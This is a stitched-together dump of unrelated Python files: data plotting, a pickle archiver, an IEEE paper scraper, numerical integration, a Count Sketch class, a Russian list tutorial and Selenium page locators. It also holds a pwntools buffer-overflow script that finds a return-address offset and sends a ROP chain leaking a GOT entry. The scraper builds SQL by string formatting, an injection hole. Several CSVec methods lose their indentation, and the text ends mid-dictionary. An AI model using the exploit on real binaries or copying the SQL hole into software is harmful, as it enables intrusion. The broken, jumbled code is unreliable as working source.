singlelineplot(prop, kor_df, "#f67bad", label='Korea')
singlelineplot(prop, usa_df, "#00ff00", label='USA')
singlelineplot(prop, ita_df, "#26c0e5", label='Italy')
plt.title(prop)
plt.show()
# Plotting the infected, dead and recovered in India
countrysituation(ind_df, 'India')
# Generating the increase of infected in Italy
# (writes frames into an "Infected/" directory, then covid.gif)
gifize(animate(ita_df, "Infected", "Italy"))
|
import pickle as pk
class Archiver:
    """Pickle-based (de)serialization with overridable transform hooks.

    Subclasses override ZipData/UnZipData to transform the payload before
    pickling / after unpickling (e.g. compression).  The base hooks are
    identity functions, so a plain Archiver round-trips data unchanged.
    """

    def ZipData(self, data):
        """Hook: transform data before pickling.  Identity by default.

        Bug fix: the bare `pass` returned None, so Zip() pickled None and
        the payload was silently lost on a base-class round trip.
        """
        return data

    def UnZipData(self, data):
        """Hook: transform data after unpickling.  Identity by default."""
        return data

    def Zip(self, data):
        """Return the pickled bytes of ZipData(data)."""
        return pk.dumps(self.ZipData(data))

    def UnZip(self, data):
        """Inverse of Zip: unpickle, then apply UnZipData.

        NOTE(security): pickle.loads can execute arbitrary code -- never
        feed it untrusted bytes.
        """
        return self.UnZipData(pk.loads(data))
#coding:utf-8
"""
@file: IEEE_download.py
@author: lyn
@contact: tonylu716@gmail.com
@python: 3.3
@editor: PyCharm
@create: 2016-08-31 14:43
@description:
专门为IEEE出版社的pdf下载模块
"""
import sys,os
# Walk `up_level_N` directories up from this script and put the project
# root on sys.path so the package imports below resolve.
up_level_N = 2
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
root_dir = SCRIPT_DIR
for i in range(up_level_N):
    root_dir = os.path.normpath(os.path.join(root_dir, '..'))
sys.path.append(root_dir)
from journal_parser.IEEE_Parser import IEEE_HTML_Parser,Article,get_ieee_pdf_link
from Journals_Task.journal_pdf_url_generators.PdfUrlGenerator import *
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from db_config import DB_CONNS_POOL
# Module-level DB cursor shared by all classes in this file.
cur = DB_CONNS_POOL.new_db_cursor()
class IEEE_Search_Model:
    """Drive an IEEE Xplore title search with selenium and hand the result
    page to the HTML parser; get_pdf_url() then resolves the PDF link.
    """
    def __init__(self,title,google_id,driver):
        self.title = title
        self.google_id = google_id
        # Retry up to 10 times: the result page is ajax-rendered and can time out.
        for i in range(10):
            search_result_url = 'http://ieeexplore.ieee.org/search/searchresult.jsp?queryText={}&newsearch=true'\
                .format('%20'.join(title.split(' ')))
            driver.get(
                url = search_result_url
            )# open the search results page with selenium
            try:
                WebDriverWait(driver, 20).until(
                    EC.presence_of_element_located((By.CLASS_NAME,'List-results-items'))
                )# wait until the site's ajax has rendered the result items, then hand off to the parser
                try:
                    # Truncate long titles for the log line only.
                    title = title[:40]
                except:
                    pass
                print('IEEE_Search_Model:\n\tGot search result of <{}>\n\tDeliver to parser...'.format(title+'...'))
                break
            except Exception as e:
                print('[Error] in IEEE_Search_Model():{}'.format(str(e)))
                print('The url of issue is:{}\nReload again..'.format(search_result_url))
        # First parsed section of the loaded result page.
        self.sec = IEEE_HTML_Parser(driver).sections[0]
        self.driver = driver
    def get_pdf_url(self):
        """Persist the article's pdf page url to the DB, then return the direct pdf link."""
        pdf_page_url = Article(self.sec).pdf_page_url
        if pdf_page_url:
            try:
                # NOTE(security): SQL built by string formatting from a scraped
                # URL -- vulnerable to SQL injection; should use a parameterized
                # query via the cursor's paramstyle.
                sql = "update articles set pdf_temp_url = '{}' where google_id = '{}'".format(pdf_page_url,self.google_id)
                cur.execute(sql)
            except Exception as e:
                print('[Error] in get_pdf_url()_update_pdf_temp_url:{}'.format(str(e)))
                print('Except SQL is {}'.format(sql))
            return get_ieee_pdf_link(pdf_page_url,self.driver)
def get_ieee_pdf_url_func(driver, unfinished_item):
    """Resolve the direct pdf link for one unfinished DB row.

    unfinished_item is (title, google_id, pdf_temp_url); returns None when
    no pdf_temp_url has been recorded yet.
    """
    pdf_temp_url = unfinished_item[2]
    if not pdf_temp_url:
        return None
    return get_ieee_pdf_link(pdf_temp_url, driver)
'''
else:
return IEEE_Search_Model(
title = unfinished_item[0],
google_id = unfinished_item[1],
driver=driver
).get_pdf_url()
'''
class IEEE_pdf_url_generator(PdfUrlGenerator):
    """Thread-pooled generator that resolves direct pdf urls for IEEE articles."""
    def __init__(self):
        PdfUrlGenerator.__init__(self)
    def get_unfinished_items(self):
        """Fetch up to query_limit IEEE articles that still lack a resource_link."""
        ret = self._get_unfinished_items(self.query_sql)
        print('IEEE_pdf_url_generator:\n\tGot {} new items in limit {}...'.format(len(ret),self.query_limit))
        return ret
    def generate(self,unfinished_item):
        # starting from the title row, resolve the pdf_url and feed it back to the db
        return self._generate(unfinished_item,
                       google_id_index = 1,
                       get_pdf_url_func = get_ieee_pdf_url_func
                       )
    def run(self,thread_counts=16,visual=True,limit=1000):
        """Resolve pdf urls for up to `limit` articles using the thread pool."""
        self.query_limit = limit
        self._run(thread_counts,visual)
        # NOTE(review): query_sql is assigned only here, after _run(); this
        # relies on _run() not consuming it -- confirm in PdfUrlGenerator.
        self.query_sql = "select title,google_id,pdf_temp_url from articles where resource_link is null\
        and link like '%ieee%' and pdf_temp_url is not null ORDER by id desc limit {}".format(limit)
        self._task_thread_pool.map(self.generate,self.get_unfinished_items())
        self._close()
if __name__=='__main__':
    from crawl_tools.WatchDog import close_procs_by_keyword
    visual = False
    # Kill leftover browser processes from earlier runs before starting:
    # chrome when running visually, phantomjs when headless.
    if visual:
        close_procs_by_keyword(keyword='chrome')
    else:
        close_procs_by_keyword(keyword='phantom')
    IEEE_pdf_url_generator().run(thread_counts=8,visual=visual,limit=1000)
from pwn import *
from pprint import pprint
# Two-stage buffer-overflow exploit for ./main.elf (amd64):
#   stage 1 crashes the target with a cyclic pattern and reads the offset of
#   the saved return address from the core dump; stage 2 pads to that offset
#   and runs a ROP chain calling puts(puts@got) to leak the GOT entry.
context.binary = "./main.elf"
context.bits = 64
context.arch = "amd64"
elf = ELF("./main.elf")
io = process("./main.elf")
print(io.recvline().decode("utf-8"))
# Stage 1: de Bruijn pattern long enough to smash the return address.
payload = cyclic(345, n=8)
io.sendline(payload)
io.wait_for_close()
core = Core("./core")
# The faulting address holds the pattern chunk that landed in the return
# slot; cyclic_find gives its offset into the payload.
fault_address = enhex(pack(core.fault_addr, endian='big'))
vuln_index = cyclic_find(unhex(str(fault_address)), n=8)
print(f"[INFO] - Vulnerable index is : {vuln_index}")
# Stage 2: ROP chain that leaks the puts GOT entry via puts itself.
rop = ROP("./main.elf")
rop.call(elf.symbols["puts"], [elf.got["puts"]])
print(f"[INFO] - puts symbols address : {elf.symbols['puts']}")
print(f"[INFO] - puts got address : {elf.got['puts']}")
io = process("./main.elf")
print(io.recvline().decode("utf-8"))
payload = [
    cyclic(vuln_index),
    rop.chain()
]
payload = b"".join(payload)
write("payload2", payload)  # keep a copy of the final payload on disk
io.sendline(payload)
io.wait_for_close()
core = Core("./core")
|
import numpy as np
def trapz(func, a, b, N):
    """Approximate the integral of func over [a, b] with the composite
    trapezoidal rule on N equal subintervals.

    Args:
        func: the integrand; must be vectorized (accept numpy arrays).
        a, b: integration limits.
        N: number of subintervals.

    Returns:
        The trapezoidal-rule estimate of the integral.
    """
    # Bug fix: `func` was previously shadowed by a hard-coded polynomial
    # (x**4 - 2x + 1), so the caller's integrand was silently ignored.
    h = (b - a) / N
    k = np.arange(1, N)
    # Endpoints get weight 1/2; the N-1 interior nodes get weight 1.
    return h * (0.5 * func(a) + 0.5 * func(b) + func(a + k * h).sum())
def simps(func, a, b, N):
    """Approximate the integral of func over [a, b] with the composite
    Simpson's rule on N subintervals (N must be even).

    Args:
        func: the integrand; must be vectorized (accept numpy arrays).
        a, b: integration limits.
        N: number of subintervals (even).

    Returns:
        The Simpson's-rule estimate of the integral.
    """
    # Bug fix: `func` was previously shadowed by a hard-coded polynomial
    # (x**4 - 2x + 1), so the caller's integrand was silently ignored.
    h = (b - a) / N
    k1 = np.arange(1, N / 2 + 1)  # odd-indexed interior nodes (weight 4)
    k2 = np.arange(1, N / 2)      # even-indexed interior nodes (weight 2)
    return (1. / 3.) * h * (func(a) + func(b)
                            + 4. * func(a + (2 * k1 - 1) * h).sum()
                            + 2. * func(a + 2 * k2 * h).sum())
import math
import numpy as np
import copy
import torch
LARGEPRIME = 2**61-1
cache = {}
#import line_profiler
#import atexit
#profile = line_profiler.LineProfiler()
#atexit.register(profile.print_stats)
class CSVec(object):
""" Count Sketch of a vector
Treating a vector as a stream of tokens with associated weights,
this class computes the count sketch of an input vector, and
supports operations on the resulting sketch.
public methods: zero, unSketch, l2estimate, __add__, __iadd__
"""
    def __init__(self, d, c, r, doInitialize=True, device=None,
                 numBlocks=1):
        """ Constructor for CSVec
        Args:
            d: the cardinality of the sketched vector
            c: the number of columns (buckets) in the sketch
            r: the number of rows in the sketch
            doInitialize: if False, you are responsible for setting
                self.table, self.signs, self.buckets, self.blockSigns,
                and self.blockOffsets
            device: which device to use (cuda or cpu). If None, chooses
                cuda if available, else cpu
            numBlocks: mechanism to reduce memory consumption. A value
                of 1 leads to a normal sketch. Higher values reduce
                peak memory consumption proportionally but decrease
                randomness of the hashes
        Note:
            Since sketching a vector always requires the hash functions
            to be evaluated for all of 0..d-1, we precompute the
            hash values in the constructor. However, this takes d*r
            memory, which is sometimes too big. We therefore only
            compute hashes of 0..(d/numBlocks - 1), and we let the
            hash of all other tokens be the hash of that token modulo
            d/numBlocks. In order to recover some of the lost randomness,
            we add a random number to each "block" (self.blockOffsets)
            and multiply each block by a random sign (self.blockSigns)
        """
        # save random quantities in a module-level variable so we can
        # reuse them if someone else makes a sketch with the same d, c, r
        global cache
        self.r = r # num of rows
        self.c = c # num of columns
        # need int() here b/c annoying np returning np.int64...
        self.d = int(d) # vector dimensionality
        # reduce memory consumption of signs & buckets by constraining
        # them to be repetitions of a single block
        self.numBlocks = numBlocks
        # choose the device automatically if none was given
        if device is None:
            device = 'cuda' if torch.cuda.is_available() else 'cpu'
        else:
            if (not isinstance(device, torch.device) and
                    not ("cuda" in device or device == "cpu")):
                msg = "Expected a valid device, got {}"
                raise ValueError(msg.format(device))
        self.device = device
        # this flag indicates that the caller plans to set up
        # self.signs, self.buckets, self.blockSigns, and self.blockOffsets
        # itself (e.g. self.deepcopy does this)
        if not doInitialize:
            return
        # initialize the sketch to all zeros
        self.table = torch.zeros((r, c), device=self.device)
        # if we already have these, don't do the same computation
        # again (wasting memory storing the same data several times)
        cacheKey = (d, c, r, numBlocks, device)
        if cacheKey in cache:
            self.signs = cache[cacheKey]["signs"]
            self.buckets = cache[cacheKey]["buckets"]
            if self.numBlocks > 1:
                self.blockSigns = cache[cacheKey]["blockSigns"]
                self.blockOffsets = cache[cacheKey]["blockOffsets"]
            return
        # initialize hashing functions for each row:
        # 2 random numbers for bucket hashes + 4 random numbers for
        # sign hashes
        # maintain existing random state so we don't mess with
        # the main module trying to set the random seed but still
        # get reproducible hashes for the same value of r
        # do all these computations on the CPU, since pytorch
        # is incapable of in-place mod, and without that, this
        # computation uses up too much GPU RAM
        rand_state = torch.random.get_rng_state()
        torch.random.manual_seed(42)
        hashes = torch.randint(0, LARGEPRIME, (r, 6),
                               dtype=torch.int64, device="cpu")
        # compute random blockOffsets and blockSigns
        if self.numBlocks > 1:
            nTokens = self.d // numBlocks
            if self.d % numBlocks != 0:
                # so that we only need numBlocks repetitions
                nTokens += 1
            self.blockSigns = torch.randint(0, 2, size=(self.numBlocks,),
                                            device=self.device) * 2 - 1
            self.blockOffsets = torch.randint(0, self.c,
                                              size=(self.numBlocks,),
                                              device=self.device)
        else:
            assert(numBlocks == 1)
            nTokens = self.d
        torch.random.set_rng_state(rand_state)
        # tokens are the indices of the vector entries
        tokens = torch.arange(nTokens, dtype=torch.int64, device="cpu")
        tokens = tokens.reshape((1, nTokens))
        # computing sign hashes (4 wise independence)
        h1 = hashes[:,2:3]
        h2 = hashes[:,3:4]
        h3 = hashes[:,4:5]
        h4 = hashes[:,5:6]
        self.signs = (((h1 * tokens + h2) * tokens + h3) * tokens + h4)
        # reduce the degree-3 polynomial hash mod LARGEPRIME, then mod 2,
        # mapping each token to a +/-1 sign
        self.signs = ((self.signs % LARGEPRIME % 2) * 2 - 1).float()
        # only move to device now, since this computation takes too
        # much memory if done on the GPU, and it can't be done
        # in-place because pytorch (1.0.1) has no in-place modulo
        # function that works on large numbers
        self.signs = self.signs.to(self.device)
        # computing bucket hashes (2-wise independence)
        h1 = hashes[:,0:1]
        h2 = hashes[:,1:2]
        self.buckets = ((h1 * tokens) + h2) % LARGEPRIME % self.c
        # only move to device now. See comment above.
        # can't cast this to int, unfortunately, since we index with
        # this below, and pytorch only lets us index with long
        # tensors
        self.buckets = self.buckets.to(self.device)
        cache[cacheKey] = {"signs": self.signs,
                           "buckets": self.buckets}
        if numBlocks > 1:
            cache[cacheKey].update({"blockSigns": self.blockSigns,
                                    "blockOffsets": self.blockOffsets})
    def zero(self):
        """ Set all the entries of the sketch to zero """
        # In-place: keeps the same tensor object, so aliases stay valid.
        self.table.zero_()
    def cpu_(self):
        """Move the sketch table to host (CPU) memory in place."""
        self.device = "cpu"
        self.table = self.table.cpu()
def cuda_(self, device="cuda"):
self.device = device
self.table = self.table.cuda()
    def half_(self):
        """Cast the sketch table to float16 in place."""
        self.table = self.table.half()
    def float_(self):
        """Cast the sketch table to float32 in place."""
        self.table = self.table.float()
    def __deepcopy__(self, memodict={}):
        # don't initialize new CSVec, since that will calculate bc,
        # which is slow, even though we can just copy it over
        # directly without recomputing it
        newCSVec = CSVec(d=self.d, c=self.c, r=self.r,
                         doInitialize=False, device=self.device,
                         numBlocks=self.numBlocks)
        newCSVec.table = copy.deepcopy(self.table)
        # The hash state (signs/buckets/block data) is intentionally SHARED
        # via the module-level cache rather than copied -- it is read-only
        # after construction.
        global cache
        cachedVals = cache[(self.d, self.c, self.r, self.numBlocks, self.device)]
        newCSVec.signs = cachedVals["signs"]
        newCSVec.buckets = cachedVals["buckets"]
        if self.numBlocks > 1:
            newCSVec.blockSigns = cachedVals["blockSigns"]
            newCSVec.blockOffsets = cachedVals["blockOffsets"]
        return newCSVec
def __imul__(self, other):
if isinstance(other, int) or isinstance(other, float):
self.table = self.table.mul_(other)
else:
raise ValueError(f"Can't multiply a CSVec by {other}")
return self
def __truediv__(self, other):
if isinstance(other, int) or isinstance(other, float):
self.table = self.table.div_(other)
else:
raise ValueError(f"Can't divide a CSVec by {other}")
return self
    def __add__(self, other):
        """ Returns the sum of self with other
        Args:
            other: a CSVec with identical values of d, c, and r
        """
        # a bit roundabout in order to avoid initializing a new CSVec
        # (deepcopy reuses the cached hash state instead of recomputing it)
        returnCSVec = copy.deepcopy(self)
        returnCSVec += other
        return returnCSVec
def __iadd__(self, other):
""" Accumulates another sketch
Args:
other: a CSVec with identical values of d, c, r, device, numBlocks
"""
if isinstance(other, CSVec):
# merges csh sketch into self
assert(self.d == other.d)
assert(self.c == other.c)
assert(self.r == other.r)
assert(self.device == other.device)
assert(self.numBlocks == other.numBlocks)
self.table += other.table
else:
raise ValueError("Can't add this to a CSVec: {}".format(other))
return self
def accumulateTable(self, table):
""" Adds a CSVec.table to self
Args:
table: the table to be added
"""
if table.size() != self.table.size():
msg = "Passed in table has size {}, expecting {}"
raise ValueError(msg.format(table.size(), self.table.size()))
self.table += table
    def accumulateVec(self, vec):
        """ Sketches a vector and adds the result to self
        Args:
            vec: the vector to be sketched (1-D, length self.d)
        """
        assert(len(vec.size()) == 1 and vec.size()[0] == self.d)
        # the vector is sketched to each row independently
        for r in range(self.r):
            buckets = self.buckets[r,:].to(self.device)
            signs = self.signs[r,:].to(self.device)
            # the main computation here is the bincount below, but
            # there's lots of index accounting leading up to it due
            # to numBlocks being potentially > 1
            for blockId in range(self.numBlocks):
                # each block covers a contiguous chunk of coordinates;
                # the final block may be short, hence the min with d
                start = blockId * buckets.size()[0]
                end = (blockId + 1) * buckets.size()[0]
                end = min(end, self.d)
                offsetBuckets = buckets[:end-start].clone()
                offsetSigns = signs[:end-start].clone()
                if self.numBlocks > 1:
                    # per-block offset and sign recover some of the
                    # randomness lost by reusing one hash block
                    offsetBuckets += self.blockOffsets[blockId]
                    offsetBuckets %= self.c
                    offsetSigns *= self.blockSigns[blockId]
                # bincount computes the sum of all values in the vector
                # that correspond to each bucket
                self.table[r,:] += torch.bincount(
                    input=offsetBuckets,
                    weights=offsetSigns * vec[start:end],
                    minlength=self.c
                )
    def _findHHK(self, k):
        """Return the k heaviest coordinates and their estimated values.

        Returns:
            (HHs, vals[HHs]): the indices of the k largest-magnitude
            estimates and those estimates themselves.
        """
        assert(k is not None)
        #tokens = torch.arange(self.d, device=self.device)
        #vals = self._findValues(tokens)
        vals = self._findAllValues()
        # sort is faster than torch.topk...
        #HHs = torch.sort(vals**2)[1][-k:]
        # topk on cuda returns what looks like uninitialized memory if
        # vals has nan values in it
        # saving to a zero-initialized output array instead of using the
        # output of topk appears to solve this problem
        # NOTE(review): the out= form of torch.topk is deprecated in newer
        # PyTorch releases -- confirm against the installed version.
        outVals = torch.zeros(k, device=vals.device)
        HHs = torch.zeros(k, device=vals.device).long()
        torch.topk(vals**2, k, sorted=False, out=(outVals, HHs))
        return HHs, vals[HHs]
def _findHHThr(self, thr):
assert(thr is not None)
vals = self._findAllValues()
HHs = vals.abs() >= thr
return HHs, vals[HHs]
""" this is a potentially faster way to compute the same thing,
but it doesn't play nicely with numBlocks > 1, so for now I'm
just using the slower code above
# to figure out which items are heavy hitters, check whether
# self.table exceeds thr (in magnitude) in at least r/2 of
# the rows. These elements are exactly those for which the median
# exceeds thr, but computing the median is expensive, so only
# calculate it after we identify which ones are heavy
tablefiltered = ( (self.table > thr).float()
- (self.table < -thr).float())
est = torch.zeros(self.d, device=self.device)
for r in range(self.r):
est += tablefiltered[r, self.buckets[r,:]] * self.signs[r, :]
est = ( (est >= math.ceil(self.r/2.)).float()
- (est <= -math.ceil(self.r/2.)).float())
# HHs - heavy coordinates
HHs = torch.nonzero(est)
return HHs, self._findValues(HHs)
"""
def _findValues(self, coords):
# estimating frequency of input coordinates
assert(self.numBlocks == 1)
d = coords.size()[0]
vals = torch.zeros(self.r, self.d, device=self.device)
for r in range(self.r):
vals[r] = (self.table[r, self.buckets[r, coords]]
* self.signs[r, coords])
return vals.median(dim=0)[0]
def _findAllValues(self):
    """ Returns the estimated value of every one of the d sketched
    coordinates: the median, across the r rows, of the signed table
    entry each coordinate hashes to.
    """
    if self.numBlocks == 1:
        vals = torch.zeros(self.r, self.d, device=self.device)
        for r in range(self.r):
            # per-row estimate: signed table entry at the coord's bucket
            vals[r] = (self.table[r, self.buckets[r,:]]
                * self.signs[r,:])
        return vals.median(dim=0)[0]
    else:
        # with multiple blocks, each block covers a contiguous chunk of
        # coordinates with its own bucket offset and sign flip
        medians = torch.zeros(self.d, device=self.device)
        for blockId in range(self.numBlocks):
            # chunk boundaries; the last block may be shorter than the rest
            start = blockId * self.buckets.size()[1]
            end = (blockId + 1) * self.buckets.size()[1]
            end = min(end, self.d)
            vals = torch.zeros(self.r, end-start, device=self.device)
            for r in range(self.r):
                buckets = self.buckets[r, :end-start]
                signs = self.signs[r, :end-start]
                # same offset/sign scheme used when sketching in
                # accumulateVec, so estimates line up with what was added
                offsetBuckets = buckets + self.blockOffsets[blockId]
                offsetBuckets %= self.c
                offsetSigns = signs * self.blockSigns[blockId]
                vals[r] = (self.table[r, offsetBuckets]
                    * offsetSigns)
            medians[start:end] = vals.median(dim=0)[0]
        return medians
def _findHHs(self, k=None, thr=None):
assert((k is None) != (thr is None))
if k is not None:
return self._findHHK(k)
else:
return self._findHHThr(thr)
def unSketch(self, k=None, epsilon=None):
    """ Performs heavy-hitter recovery on the sketch
    Args:
        k: if not None, the number of heavy hitters to recover
        epsilon: if not None, the approximation error in the recovery.
            The returned heavy hitters are estimated to be greater
            than epsilon * self.l2estimate()
    Returns:
        A dense vector that is zero everywhere except at the recovered
        heavy-hitter coordinates, which carry their estimated values
    Note:
        exactly one of k and epsilon must be non-None
    """
    # threshold recovery needs a concrete cutoff derived from the
    # estimated L2 norm; top-k recovery passes thr=None through
    thr = None if epsilon is None else epsilon * self.l2estimate()
    coords, values = self._findHHs(k=k, thr=thr)
    if k is not None:
        assert len(values) == k
    if epsilon is not None:
        assert (values < thr).sum() == 0
    # scatter the recovered values into an otherwise-zero dense vector
    result = torch.zeros(self.d, device=self.device)
    result[coords] = values
    return result
def l2estimate(self):
    """Estimate the L2 norm of the sketched vector.

    The squared-norm estimate is the median, across rows, of each row's
    sum of squared counters.
    """
    row_sq_norms = torch.sum(self.table ** 2, 1)
    return np.sqrt(torch.median(row_sq_norms).item())
@classmethod
def median(cls, csvecs):
    """Return a new sketch whose table is the elementwise median of the
    tables of the given sketches.

    All sketches must agree on d, c, r, device and numBlocks.
    """
    reference = csvecs[0]
    for candidate in csvecs:
        assert(candidate.d == reference.d)
        assert(candidate.c == reference.c)
        assert(candidate.r == reference.r)
        assert(candidate.device == reference.device)
        assert(candidate.numBlocks == reference.numBlocks)
    stacked = torch.stack([candidate.table for candidate in csvecs])
    merged = copy.deepcopy(reference)
    merged.table = torch.median(stacked, dim=0)[0]
    return merged
|
students = ['Ivan', 'Masha', 'Sasha']
for student in students:
print('Hello,' + student + '!')
# Доступ происходит с помощью индексов
students = ['Ivan', 'Masha', 'Sasha']
#Длина списка: len(students)
# Доступ к эл.списка осуществляется как и к строкам
#так же берем и отрицательные индексы
students[-1] 'Sasha'
students[-2] 'Masha'
students[-3] 'Ivan'
#Операции со списками
+
students = ['Ivan', 'Masha', 'Sasha']
teachers = ['Oleg', 'Alex']
students + teachers
Результат: ['Ivan', 'Masha', 'Sasha','Oleg', 'Alex']
*
[0,1]*4
Результат: [0,1,0,1,0,1,0,1]
# Изменение списков
#В отличие от изученных типов данных
(int, float, str) списки (list) являются ИЗМЕНЯЕМЫМИ
#Изменение конкретного элемента списка
students = ['Ivan', 'Masha', 'Sasha']
students[1] = 'Oleg'
print(students)
#Результат: ['Ivan', 'Oleg', 'Sasha']
#Добавление элемента списка
students = ['Ivan', 'Masha', 'Sasha']
students.append('Olga')
#Результат: ['Ivan', 'Masha', 'Sasha', 'Olga']
students += ['Olga']
#Результат: ['Ivan', 'Masha', 'Sasha', 'Olga', 'Olga']
students += ['Boris', 'Sergey']
#Результат: ['Ivan', 'Masha', 'Sasha', 'Olga', 'Olga','Boris', 'Sergey']
#Пустой список:
students = []
# Вставка элементов списка
students = ['Ivan', 'Masha', 'Sasha']
students.insert(1,'Olga')
#Результат: ['Ivan', 'Olga', 'Masha', 'Sasha']
students = ['Ivan', 'Masha', 'Sasha']
students += ['Olga']
students += 'Olga'
print(students)
#Результат: ['Ivan', 'Masha', 'Sasha', 'Olga', 'O', 'l', 'g', 'a']
#Удаление элемента из списка
students = ['Ivan', 'Masha', 'Sasha']
students.remove('Sasha')
#или
del students[0]
#Поиск элемента в списке
# 1 способ
students = ['Ivan', 'Masha', 'Sasha']
if 'Ivan' in students:
print('Ivan is here')
if 'Ann' not in students:
print('Ann is out')
# 2 способ
ind = students.index('Sasha')
#Результат: 2
ind = students.index('Ann')
#Результат: ValueError: 'Ann' is not in list
#Сортировка списка
# 1 Способ не меняет сам список
students = ['Sasha','Ivan', 'Masha']
ordered_students = sorted(students)
#Результат: ['Ivan', 'Masha', 'Sasha']
# 2 способ меняет сам список
students.sort()
#Результат: ['Ivan', 'Masha', 'Sasha']
#Если не нужно сортировать весь список, а нужно только получить
#самого первого или самого последнего используем (элементы должны быть сравнимы)
min()
max()
# Список в обратном порядке(Изменяет сам список)
students = ['Sasha','Ivan', 'Masha']
students.reverse()
#Результат: ['Masha', 'Ivan', 'Sasha']
# не изменяют сам список:
reversed(students)
students[::-1]
# Присвоение списков
a = [1, 'A', 2]
b = a
a[0] = 42
#Значение a: [42, 'A', 2]
#Значение b: [42, 'A', 2]
b[2] = 30
#Значение b: [42, 'A', 30]
#Значение a: [42, 'A', 30]
# Генерация списков
a = [0]*5
a = [0 for i in range(5)]
a = [i * i for i in range(5)]
a = [int(i) for i in input().split()] #split - делит строку по пробелам
#Напишите программу, на вход которой подается одна строка с целыми числами.
#Программа должна вывести сумму этих чисел.
a = [int(i) for i in input().split()]
print(sum(a))
#На вход подаётся список чисел одной строкой.
#Программа должна для каждого элемента этого списка вывести сумму двух его соседей.
#Для элементов списка, являющихся крайними, одним из соседей считается элемент,
#находящий на противоположном конце этого списка.
#Если на вход пришло только одно число, надо вывести его же.
#Вывод должен содержать одну строку с числами нового списка, разделёнными пробелом.
# Read integers; for each element print the sum of its two neighbours.
# The list is treated as circular; a single element is printed as-is.
a = [int(i) for i in input().split()]
l = len(a)- 1
s = 0
nov = []
i = 0
if len(a) == 0:
    # empty input: print a bare zero
    print(str(0))
else:
    for ai in a:
        if len(a) > 1:
            if i == 0:
                # first element: neighbours are the second and the last
                s = a[i+1] + a[-1]
                nov.append(s)
            elif i > 0 and i < l:
                # interior element: neighbours on both sides
                s = a[i-1] + a[i+1]
                nov.append(s)
            elif i == l:
                # last element: neighbours are the previous one and the first
                s = a[i-1] + a[0]
                nov.append(s)
        elif len(a) == 1:
            # single element: its "neighbour sum" is itself
            s = a[i]
            nov.append(s)
        i += 1
    j = 0
    # print the results space-separated on one line
    for ai2 in nov:
        print(str(nov[j])+' ', end='')
        j += 1
#На вход подается список чисел в одной строке, вывод в
#одну строку повторяющихся более одного раза значений.
#Выводимые числа не должны повторяться, порядок их вывода
#может быть произвольным.
# Read integers; print (once each) the values that occur more than once.
s = [ int(i) for i in input().split()]
nov = []
s.sort()
l = len(s)-1
# sentinel remembering the last duplicate already reported
# NOTE(review): an input actually containing 100000 would defeat this sentinel
k = 100000
if len(s)!=1:
    # adjacent equal values in the sorted list are duplicates
    for i in range(0,l):
        if s[i] == s[i+1] and s[i] != k:
            nov.append(s[i])
            k = s[i]
    # re-check the final adjacent pair
    # NOTE(review): s[-2] raises IndexError for empty input -- confirm the
    # input is guaranteed non-empty
    for j in range(l,l+1):
        if s[-1] == s[-2] and s[j] != k:
            nov.append(s[j])
n = len(nov)
for g in range(0,n):
    print(nov[g],end=' ')
# Генерация двумерных списков
a = [[1,2,3],[4,5,6],[7,8,9]]
a[1] -> [4,5,6]
a[1][1] -> 5
# Инициализация дум.списков
n = 3
a = [[0]*n]*n
a[0][0] = 5 #в первом стобце все элементы 5
# Зависимый список поскольку создали строку из n нулей и скопировали ссылку на нее n раз
#Создание n списков из n нулей, где каждый список будет независимый
a = [[0] * n for i in range(n)]
a =[[0 for j in range(n)] for i in range(n)]
|
from tests.UAT.page_models.book import Book
# Web locators (and locator data) for the cart page.
# ID of the "add to cart" button.
ADD_TO_CART_BUTTON_ID = "add-to-cart-button"
# ID of the cart icon at the top of the page.
CART_ICON_ID = "nav-cart"
# ID of the quantity dropdown used to increment/decrement items in the cart.
CART_QUANTITY_DROP_DOWN_ID = "item_quantity"
# CSS selector for the first item in the cart.
FIRST_ITEM_NAME_IN_CART_CSS_SELECTOR = ".sc-product-title"
# CSS selector for the checkbox that turns an item into a gift.
GIFT_CHECKBOX_CSS_SELECTOR = ".sc-gift-option > label:nth-child(1) > input:nth-child(1)"
# CSS selector for the heading shown above a saved item, e.g. 'saved item (1 item)'.
SAVE_FOR_LATER_HEADING_CSS_SELECTOR = ".sc-list-caption"
# ID of the cart subtotal label, e.g. 'subtotal (1 items): $5.99'.
SUB_TOTAL_CART_ID = "sc-subtotal-label-activecart"
# Class name of the dropdown used to increment/decrement items in the cart.
SHOPPING_CART_QUANTITY_DROPDOWN_CLASS_NAME = "select.a-native-dropdown"
# Tag of the heading displayed above the cart.
CART_H2_TAG = "h2"
# Book titles needed for testing.
_TEST_AUTOMATION = Book.Title.TEST_AUTOMATION
_AGILE_TESTING = Book.Title.AGILE_TESTING
_SELENIUM_WEBDRIVER = Book.Title.SELENIUM_WEB_DRIVER
# CSS selectors for the 'save for later' link of each book.
# NOTE(review): the Agile Testing and Selenium WebDriver save-for-later
# selectors are still placeholders (NotImplemented) -- confirm before use.
_AGILE_TESTING_SAVE_FOR_LATER_CSS_SELECTOR = NotImplemented
_SELENIUM_WEB_DRIVER_SAVE_FOR_LATER_CSS_SELECTOR = NotImplemented
_TEST_AUTOMATION_SAVE_FOR_LATER_CSS_SELECTOR = "div.sc-list-item:nth-child(3) > div:nth-child(4) > " \
                                               "div:nth-child(1) > div:nth-child(1) > div:nth-child(1) " \
                                               "> div:nth-child(1) > div:nth-child(2) > div:nth-child(2)" \
                                               " > span:nth-child(3) > span:nth-child(1) > input:nth-child(1)"
# CSS selectors for the delete link of each book.
# NOTE(review): the Test Automation delete selector is still a placeholder.
_SELENIUM_WEB_DRIVER_DELETE_LINK_CSS_SELECTOR = ".sc-action-delete > span:nth-child(1) > input:nth-child(1)"
_TEST_AUTOMATION_DELETE_LINK_CSS_SELECTOR = NotImplemented
_AGILE_TESTING_DELETE_LINK_CSS_SELECTOR = "div.sc-list-item:nth-child(2) > div:nth-child(4) > div:nth-child(1) >" \
                                          " div:nth-child(1) > div:nth-child(1) > div:nth-child(1) >" \
                                          " div:nth-child(2) > div:nth-child(2) > span:nth-child(1) > " \
                                          "span:nth-child(1) > input:nth-child(1)"
# Maps a cart action to a {book title: locator} lookup.
data = {
    "save_item_for_later": {
        _TEST_AUTOMATION: _TEST_AUTOMATION_SAVE_FOR_LATER_CSS_SELECTOR,
        # BUG FIX: Agile Testing previously mapped to the Selenium WebDriver
        # selector, so two different books resolved to the same element.
        # It now maps to its own constant (still NotImplemented upstream,
